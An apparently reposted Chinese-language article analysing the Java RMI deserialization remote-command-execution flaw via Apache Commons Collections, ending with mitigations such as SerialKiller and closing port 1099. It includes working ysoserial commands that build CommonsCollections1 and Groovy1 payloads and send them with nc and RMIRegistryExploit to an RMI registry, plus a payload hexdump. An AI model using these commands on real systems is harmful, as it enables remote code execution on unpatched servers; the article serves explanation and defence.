本篇文章給大家分享的是有關JAVA反序列化中Rmi命令執行漏洞的分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
讓客戶滿意是我們工作的目標,不斷超越客戶的期望值來自于我們對這個行業的熱愛。我們立志把好的技術通過有效、簡單的方式提供給客戶,將通過不懈努力成為客戶在信息化領域值得信任、有價值的長期合作伙伴,公司提供的服務項目有:域名注冊、虛擬空間、營銷軟件、網站建設、玉林網站維護、網站推廣。
早在2015年的1月28號,Gabriel Lawrence和Chris Frohoff在AppSecCali上給出了一個報告,報告中介紹了Java反序列化漏洞可以利用Apache Commons Collections這個常用的Java庫來實現任意代碼執行,但當時并沒有引起太大的關注。后來FoxGlove Security安全團隊發布了一篇長博客,闡述了利用Java反序列化和Apache Commons Collections這一基礎類庫實現遠程命令執行的真實案例,各大Java Web Server紛紛躺槍,這個漏洞橫掃WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版,當時各大src平臺已被該漏洞刷屏,漏洞鋪天蓋地而來。
針對這個"2015年最被低估"的漏洞,各大受影響的Java應用廠商陸續發布了修復后的版本,Apache Commons Collections項目也對存在漏洞的類庫進行了一定的安全處理,但是網絡上仍有大量網站受此漏洞影響。本次討論的對象是JAVA RMI反序列化遠程命令執行漏洞。
RMI是REMOTE METHODINVOCATION的簡稱,是J2SE的一部分,能夠讓程序員開發出基于JAVA的分布式應用。一個RMI對象是一個遠程JAVA對象,可以從另一個JAVA虛擬機上(甚至跨過網絡)調用它的方法,可以像調用本地JAVA對象的方法一樣調用遠程對象的方法,使分布在不同的JVM中的對象的外表和行為都像本地對象一樣。對于任何一個以對象為參數的RMI接口,你都可以發一個自己構建的對象,迫使服務器端將這個對象按任何一個存在于class path中的可序列化類來反序列化。
Java rmi遠程調用如下:
RMI遠程調用步驟:
l 客戶對象調用客戶端輔助對象上的方法
l 客戶端輔助對象打包調用信息(變量,方法名),通過網絡發送給服務端輔助對象
l 服務端輔助對象將客戶端輔助對象發送來的信息解包,找出真正被調用的方法以及該方法所在對象
l 調用真正服務對象上的真正方法,并將結果返回給服務端輔助對象
l 服務端輔助對象將結果打包,發送給客戶端輔助對象
l 客戶端輔助對象將返回值解包,返回給客戶對象
l 客戶對象獲得返回值
1099端口是Java RMI的默認端口,RMI默認使用序列化來完成所有的交互,所以這是非常常見的漏洞。如果該端口暴露在公網上,且使用了Apache Commons Collections的漏洞版本,就可以在該服務器上執行相關命令。此處嘗試利用ysoserial進行漏洞分析。
利用Java中Proxy的形式對攻擊payload進行封裝,并在對Proxy實現重新封裝的過程中使用了大量的泛類型,使得payload可以應對不同的應用。
利用該漏洞可在服務器上執行相關命令,此處舉例如下
$ java -jar ysoserial.jar CommonsCollections1 calc.exe |xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc xx.xx.xx.xx 1099 < groovypayload.bin
$ java -cp ysoserial.jarysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
利用該漏洞查看相關datasource文件內容
RMI服務的攻擊,同樣可以使用URLClassLoader
方法進行回顯
雖然Java RMI服務遠程命令執行漏洞過去了4年的時間,但是公網上依然有很多服務器存在該漏洞,此處對國內1099的端口開放情況做了初步統計,具體結果如下:
通過對簡單掃描結果進行統計發現,1099端口中國開放12310臺,其中將端口用于RMI交互的主機3891臺,占比31.6%;存在反序列化漏洞3114臺,占比 25.29%。
? 關閉rmi服務的端口在公網的開放;
? 下載SerialKiller臨時補丁,這個jar后放置于classpath,將應用代碼中的java.io.ObjectInputStream替換為SerialKiller,之后配置讓其能夠允許或禁用一些存在問題的類,SerialKiller有Hot-Reload,Whitelisting,Blacklisting幾個特性,控制了外部輸入反序列化后的可信類型
? 在不影響業務的情況下,臨時刪除掉項目里的InvokerTransformer.class文件;
? 定時對WebLogic、Apache、JBoss等中間件進行升級。
以上就是JAVA反序列化中Rmi命令執行漏洞的分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注創新互聯行業資訊頻道。
網站題目:JAVA反序列化中Rmi命令執行漏洞的分析
分享URL:http://m.newbst.com/article6/jicpig.html
成都網站建設公司_創新互聯,為您提供用戶體驗、App開發、軟件開發、網站建設、ChatGPT、網站制作
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯